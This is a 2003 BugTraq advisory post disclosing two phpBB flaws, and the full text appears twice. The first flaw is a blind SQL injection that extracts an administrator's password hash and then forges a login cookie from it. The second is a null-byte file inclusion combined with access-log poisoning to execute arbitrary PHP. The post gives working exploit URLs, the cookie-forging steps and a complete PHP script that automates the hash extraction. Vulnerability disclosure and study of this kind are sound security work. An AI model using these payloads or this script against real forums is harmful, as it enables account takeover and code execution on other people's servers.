BugTraq
Back to list
|
Post reply
phpBB Security Bugs
Feb 20 2003 08:37PM
Lucas Armstrong (lucas cgishield com)
(1 replies)
phpBB Security Bugs 2-18-2003
http://CGIshield.com
Security Issue in phpBB 2.0,2.01, 2.02 (Fixed in 2.03)
phpBB, the most popular open source bulletin board software on the net, is
vulnerable to a remotely exploitable SQL injection bug which allows
stealing an administrator's password hash. With the hash, an attacker may
login and gain complete control of the administrative side of the system.
The actual attack carried out via a select fish attack, by manipulating
the select query in the page_header.php file in order to return users
online based on certain criteria, such as characters of their password
hash.
For example, if the user is attemping to hack a user_id of '40' he will
request the following page:
http://site/phpBB/index.php?forum_id=1+or+user_id=40+and+mid
(user_password,1,1)=char(97)/*
The resultant query will be:
SELECT u.username, u.user_id, u.user_allow_viewonline, u.user_level,
s.session_logged_in, s.session_ip FROM phpbb_users u, phpbb_sessions s
WHERE u.user_id = s.session_user_id AND s.session_time >= 1035778374 AND
s.session_page = 1 or user_id=40 and mid(user_password,1,1)=char(97)/*
ORDER BY u.username ASC, s.session_ip ASC
If a correct password hash digit is guessed, the admin's name will show up
as an online user, in the online user list at the bottom of the forum
page. After the password hash is determined, it is then placed in the
cookie and access is granted to the site.
So if the user_id is 32360 and the password hash is
6a204bd89f3c8348afd5c77c717a097a, then an attacker would take the
following value:
a:2:
{s:11:"autologinid";s:32:"6a204bd89f3c8348afd5c77c717a097a";s:6:"userid"
;s:
5:"31360";} www.phpbb.com/ 1536 1063947136 29596959 197425936 29523534 *
urlencode() it, and place it in a cookie with the variable
name 'phpbb2support_data', then access would be gained to the admin panel
on any phpbb site.
One could use a script to speed the process of exploiting this
vulnerability. Something similar to the script at the end of this document.
Security issue in PHPbb 1.4.x
PHPbb, the most popular open source bulletin board software on the net, is
vulnerable to a remotely exploitable file manipulation attack, which may
allow an attacker to execute arbitrary php code on the system.
It involves the following code which is located in auth.php:
include('language/lang_'.$default_lang.'.'.$phpEx);
This code strips all slashes from incoming user data, thereby unescaping
any user inputed NULL bytes. An attacker can then supply a null byte ('%
00' when urlencoded) , and any characters which come after the null byte
arent treated as part of the file name. This is because when the PHP
interpreter reads the file name, it will stop at the first null byte.
In this particular situation, the ability to poison the filename is
significant, because a user may then load any file on the system into the
interpreter and have PHP execute it. For example, if a user selects a
language of value:
'/../../../var/logs/apache/access.log%00' ,
The apache access.log will be included by this attack.
This flaw can be exploited by registering an account, logging in, and then
calling the following url. (replace user=admin with the registered name,
and passwd=asdfasdf with corresponding password):
http://localhost/phpBB/prefs.php?HTTP_POST_VARS[save]
=1&passwd=asdfasdf&viewemail=0&savecookie=0&sig=0&smile=0&dishtml=0&disb
bco
de=0&themes=1&lang=/../../../var/logs/apache/access.log%
00&save=1&user=admin&submit=Save%20Preferences
What good is the ability to execute any file on the target server? Well
consider if the attacker calls the url:
http://sitename.com/phpbb/index.php<?phpinfo();?>
The PHP command is stored in the apache access.log file, and then executed
by the include() function, thereby allowing an attacker to execute
arbitrary PHP on any target server.
PHPbb responded: " As for the 1.4.4 bug, we won't fix that. We've said
time and again that there are many security flaws in 1.4.4 and that any
sane webmaster should upgrade to 2.x. Please don't bother searching for or
notifying us of phpBB 1.x bugs."
<?php
########## PHPBB 2.0,2.01,2.02 Auto-SelectFish Attacker
########## David (at) cgishield (dot) com [email concealed]
// To use this program, simply upload it to a php enabled webserver, and
execute
// If php times out before the whole password hash is determined,
// adjust the maximum script execution time in php.ini
// Also, replace following with correct values:
$server="192.168.1.100";
$script="/phpbb2/index.php";
$the_userid_to_hack="2";
// don't change this
$data_to_match="In total there are <b>0</b> users online";
$checkchar[0]="char(48)";
$checkchar[1]="char(49)";
$checkchar[2]="char(50)";
$checkchar[3]="char(51)";
$checkchar[4]="char(52)";
$checkchar[5]="char(53)";
$checkchar[6]="char(54)";
$checkchar[7]="char(55)";
$checkchar[8]="char(56)";
$checkchar[9]="char(57)";
$checkchar[a]="char(97)";
$checkchar[b]="char(98)";
$checkchar[c]="char(99)";
$checkchar[d]="char(100)";
$checkchar[e]="char(101)";
$checkchar[f]="char(102)";
for($i=1;$i<33;$i++){
reset($checkchar);
while (list($i2, $i2val) = @each($checkchar)){
$vars="forum_id=1+or+user_id=$the_userid_to_hack+and+mid
(user_password,$i,1)=$checkchar[$i2]/*";
$data=sendToHost("$server",'post',"$script","$vars");
if (eregi("$data_to_match","$data")){
//echo("<b>$i2</b>");
}
else{echo("<br>$i= $i2"); flush();break;}
}
}
function sendToHost($host,$method,$path,$data,$useragent=1)
{
$method = strtoupper($method);
$fp = fsockopen($host,80);
fputs($fp, "$method $path HTTP/1.1\n");
fputs($fp, "Host: $host\n");
fputs($fp, "Content-type: application/x-www-form-urlencoded\n");
fputs($fp, "Content-length: " . strlen($data) . "\n");
if ($useragent)
fputs($fp, "User-Agent: Mozilla\n");
fputs($fp, "Connection: close\n\n");
if ($method == 'POST')
fputs($fp, $data);
while (!feof($fp))
$buf .= fgets($fp,128);
fclose($fp);
for($slow=0;$slow<100;$slow++){}
return $buf;
}
?>
Vulnerability discovered by: David Zentner, david (at) cgishield (dot) com [email concealed]
http://CGIshield.com
[ reply ]
Re: phpBB Security Bugs
Feb 21 2003 10:19AM
Konrad Rieck (kr roqe org)
(1 replies)
Re: phpBB Security Bugs
Feb 22 2003 10:20AM
Christian Vogel (chris obelix hedonism cx)
Privacy Statement
Copyright 2010, SecurityFocus
phpBB Security Bugs 2-18-2003
http://CGIshield.com
Security Issue in phpBB 2.0,2.01, 2.02 (Fixed in 2.03)
phpBB, the most popular open source bulletin board software on the net, is
vulnerable to a remotely exploitable SQL injection bug which allows
stealing an administrator's password hash. With the hash, an attacker may
login and gain complete control of the administrative side of the system.
The actual attack carried out via a select fish attack, by manipulating
the select query in the page_header.php file in order to return users
online based on certain criteria, such as characters of their password
hash.
For example, if the user is attemping to hack a user_id of '40' he will
request the following page:
http://site/phpBB/index.php?forum_id=1+or+user_id=40+and+mid
(user_password,1,1)=char(97)/*
The resultant query will be:
SELECT u.username, u.user_id, u.user_allow_viewonline, u.user_level,
s.session_logged_in, s.session_ip FROM phpbb_users u, phpbb_sessions s
WHERE u.user_id = s.session_user_id AND s.session_time >= 1035778374 AND
s.session_page = 1 or user_id=40 and mid(user_password,1,1)=char(97)/*
ORDER BY u.username ASC, s.session_ip ASC
If a correct password hash digit is guessed, the admin's name will show up
as an online user, in the online user list at the bottom of the forum
page. After the password hash is determined, it is then placed in the
cookie and access is granted to the site.
So if the user_id is 32360 and the password hash is
6a204bd89f3c8348afd5c77c717a097a, then an attacker would take the
following value:
a:2:
{s:11:"autologinid";s:32:"6a204bd89f3c8348afd5c77c717a097a";s:6:"userid"
;s:
5:"31360";} www.phpbb.com/ 1536 1063947136 29596959 197425936 29523534 *
urlencode() it, and place it in a cookie with the variable
name 'phpbb2support_data', then access would be gained to the admin panel
on any phpbb site.
One could use a script to speed the process of exploiting this
vulnerability. Something similar to the script at the end of this document.
Security issue in PHPbb 1.4.x
PHPbb, the most popular open source bulletin board software on the net, is
vulnerable to a remotely exploitable file manipulation attack, which may
allow an attacker to execute arbitrary php code on the system.
It involves the following code which is located in auth.php:
include('language/lang_'.$default_lang.'.'.$phpEx);
This code strips all slashes from incoming user data, thereby unescaping
any user inputed NULL bytes. An attacker can then supply a null byte ('%
00' when urlencoded) , and any characters which come after the null byte
arent treated as part of the file name. This is because when the PHP
interpreter reads the file name, it will stop at the first null byte.
In this particular situation, the ability to poison the filename is
significant, because a user may then load any file on the system into the
interpreter and have PHP execute it. For example, if a user selects a
language of value:
'/../../../var/logs/apache/access.log%00' ,
The apache access.log will be included by this attack.
This flaw can be exploited by registering an account, logging in, and then
calling the following url. (replace user=admin with the registered name,
and passwd=asdfasdf with corresponding password):
http://localhost/phpBB/prefs.php?HTTP_POST_VARS[save]
=1&passwd=asdfasdf&viewemail=0&savecookie=0&sig=0&smile=0&dishtml=0&disb
bco
de=0&themes=1&lang=/../../../var/logs/apache/access.log%
00&save=1&user=admin&submit=Save%20Preferences
What good is the ability to execute any file on the target server? Well
consider if the attacker calls the url:
http://sitename.com/phpbb/index.php<?phpinfo();?>
The PHP command is stored in the apache access.log file, and then executed
by the include() function, thereby allowing an attacker to execute
arbitrary PHP on any target server.
PHPbb responded: " As for the 1.4.4 bug, we won't fix that. We've said
time and again that there are many security flaws in 1.4.4 and that any
sane webmaster should upgrade to 2.x. Please don't bother searching for or
notifying us of phpBB 1.x bugs."
<?php
########## PHPBB 2.0,2.01,2.02 Auto-SelectFish Attacker
########## David (at) cgishield (dot) com [email concealed]
// To use this program, simply upload it to a php enabled webserver, and
execute
// If php times out before the whole password hash is determined,
// adjust the maximum script execution time in php.ini
// Also, replace following with correct values:
$server="192.168.1.100";
$script="/phpbb2/index.php";
$the_userid_to_hack="2";
// don't change this
$data_to_match="In total there are <b>0</b> users online";
$checkchar[0]="char(48)";
$checkchar[1]="char(49)";
$checkchar[2]="char(50)";
$checkchar[3]="char(51)";
$checkchar[4]="char(52)";
$checkchar[5]="char(53)";
$checkchar[6]="char(54)";
$checkchar[7]="char(55)";
$checkchar[8]="char(56)";
$checkchar[9]="char(57)";
$checkchar[a]="char(97)";
$checkchar[b]="char(98)";
$checkchar[c]="char(99)";
$checkchar[d]="char(100)";
$checkchar[e]="char(101)";
$checkchar[f]="char(102)";
for($i=1;$i<33;$i++){
reset($checkchar);
while (list($i2, $i2val) = @each($checkchar)){
$vars="forum_id=1+or+user_id=$the_userid_to_hack+and+mid
(user_password,$i,1)=$checkchar[$i2]/*";
$data=sendToHost("$server",'post',"$script","$vars");
if (eregi("$data_to_match","$data")){
//echo("<b>$i2</b>");
}
else{echo("<br>$i= $i2"); flush();break;}
}
}
function sendToHost($host,$method,$path,$data,$useragent=1)
{
$method = strtoupper($method);
$fp = fsockopen($host,80);
fputs($fp, "$method $path HTTP/1.1\n");
fputs($fp, "Host: $host\n");
fputs($fp, "Content-type: application/x-www-form-urlencoded\n");
fputs($fp, "Content-length: " . strlen($data) . "\n");
if ($useragent)
fputs($fp, "User-Agent: Mozilla\n");
fputs($fp, "Connection: close\n\n");
if ($method == 'POST')
fputs($fp, $data);
while (!feof($fp))
$buf .= fgets($fp,128);
fclose($fp);
for($slow=0;$slow<100;$slow++){}
return $buf;
}
?>
Vulnerability discovered by: David Zentner, david (at) cgishield (dot) com [email concealed]
http://CGIshield.com
[ reply ]